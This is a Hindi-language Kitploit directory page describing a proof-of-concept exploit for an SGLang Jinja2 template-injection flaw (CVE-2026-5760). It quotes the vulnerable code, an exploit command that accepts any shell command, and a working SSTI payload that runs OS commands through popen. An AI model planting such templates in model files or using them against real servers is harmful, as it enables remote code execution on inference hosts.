Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SGLang-0.5.9-RCE — CVE-2026-5760 का प्रूफ ऑफ कॉन्सेप्ट शोषण - दुर्भावनापूर्ण GGUF के माध्यम से SGLang 0.5.9 में RCE | Kitploit
उपकरण/GitHubGitHub/stuub/sglang-0.5.9-rce
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubstuub/sglang-0.5.9-rce

SGLang-0.5.9-RCE

CVE-2026-5760 का प्रूफ ऑफ कॉन्सेप्ट शोषण - दुर्भावनापूर्ण GGUF के माध्यम से SGLang 0.5.9 में RCE

रिपॉजिटरी देखें
524 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SGLang SSTI से RCE PoC — अनसैंडबॉक्स्ड Jinja2 चैट टेम्पलेट रेंडरिंग (CVE-2026-5760)

SGLang के reranking एंडपॉइंट में Server-Side Template Injection (SSTI) के माध्यम से Remote Code Execution। एक दुर्भावनापूर्ण GGUF मॉडल फ़ाइल जिसमें क्राफ्टेड tokenizer.chat_template होता है, SGLang में लोड होने और /v1/rerank एंडपॉइंट को कॉल करने पर मनमाना कोड निष्पादन प्राप्त करती है।

विशेषताएँ

अनसैंडबॉक्स्ड Jinja2 टेम्पलेट रेंडरिंग के माध्यम से SGLang में Critical Severity भेद्यता का लाभ उठाता है। SGLang का reranking एंडपॉइंट (/v1/rerank) मॉडल-आपूर्ति किए गए चैट टेम्पलेट्स को ImmutableSandboxedEnvironment के बजाय jinja2.Environment() का उपयोग करके रेंडर करता है, जिससे एक दुर्भावनापूर्ण मॉडल inference सर्वर पर मनमाना Python कोड निष्पादित कर सकता है।

यह उसी भेद्यता वर्ग से संबंधित है जैसा CVE-2024-34359 ("Llama Drama") है, जिसने llama-cpp-python को प्रभावित किया था।

हमले के चरण

  1. हमलावर एक Jinja2 SSTI पेलोड युक्त दुर्भावनापूर्ण tokenizer.chat_template के साथ एक GGUF मॉडल फ़ाइल तैयार करता है
  2. टेम्पलेट में serving_rerank.py में भेद्य कोड पथ को सक्रिय करने के लिए Qwen3 reranker ट्रिगर वाक्यांश शामिल होता है
  3. पीड़ित SGLang में मॉडल डाउनलोड कर लोड करता है (जैसे, HuggingFace से)
  4. जब कोई अनुरोध /v1/rerank पर पहुंचता है, SGLang chat_template को पढ़ता है और उसे jinja2.Environment() के साथ रेंडर करता है — कोई सैंडबॉक्स नहीं
  5. SSTI पेलोड सर्वर पर मनमाना Python कोड निष्पादित करता है

भेद्य कोड

फ़ाइल: python/sglang/srt/entrypoints/openai/serving_rerank.py

root@kitploit:~
# serving_rerank.py lines 128-132 — UNSANDBOXED
def _get_jinja_env():
    return jinja2.Environment(           # <-- Should be ImmutableSandboxedEnvironment
        loader=jinja2.BaseLoader(),
        autoescape=False,
        undefined=jinja2.Undefined,
    )

उपयोग

PoC एक दुर्भावनापूर्ण GGUF फ़ाइल उत्पन्न करता है और SGLang के अनसैंडबॉक्स्ड रेंडरिंग पथ के माध्यम से कोड निष्पादन को प्रदर्शित करता है।

root@kitploit:~
python3 exploit.py "id"

किसी भी शेल कमांड को तर्क के रूप में पास करें — डिफ़ॉल्ट id है।

SSTI पेलोड

GGUF फ़ाइल में एम्बेडेड दुर्भावनापूर्ण चैट टेम्पलेट:

root@kitploit:~
MALICIOUS_TEMPLATE = (
    'The answer can only be "yes" or "no".\n'
    '{{ lipsum.__globals__["os"].popen("echo SGLANG_RCE_CONFIRMED").read() }}'
    '{% for message in messages %}{{ message["content"] }}{% endfor %}'
)
  • ट्रिगर वाक्यांश (The answer can only be "yes" or "no") SGLang की Qwen3 reranker डिटेक्शन को सक्रिय करने के लिए आवश्यक है, जो अनुरोध को भेद्य _render_jinja_chat_template() पथ के माध्यम से रूट करता है।
  • lipsum.__globals__["os"].popen() मनमाने OS कमांड को निष्पादित करने के लिए Jinja2 कॉन्टेक्स्ट से बच निकलता है।

संदर्भ

  • CVE-2026-5760
  • CVE-2024-34359 — llama-cpp-python में समान भेद्यता वर्ग
  • CVE-2025-61620 — चैट टेम्पलेट्स के माध्यम से vLLM में DoS (समान हमला सतह)
  • SGLang GitHub
  • CWE-1336: टेम्पलेट इंजन में प्रयुक्त विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन
  • CWE-94: कोड निर्माण का अनुचित नियंत्रण

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें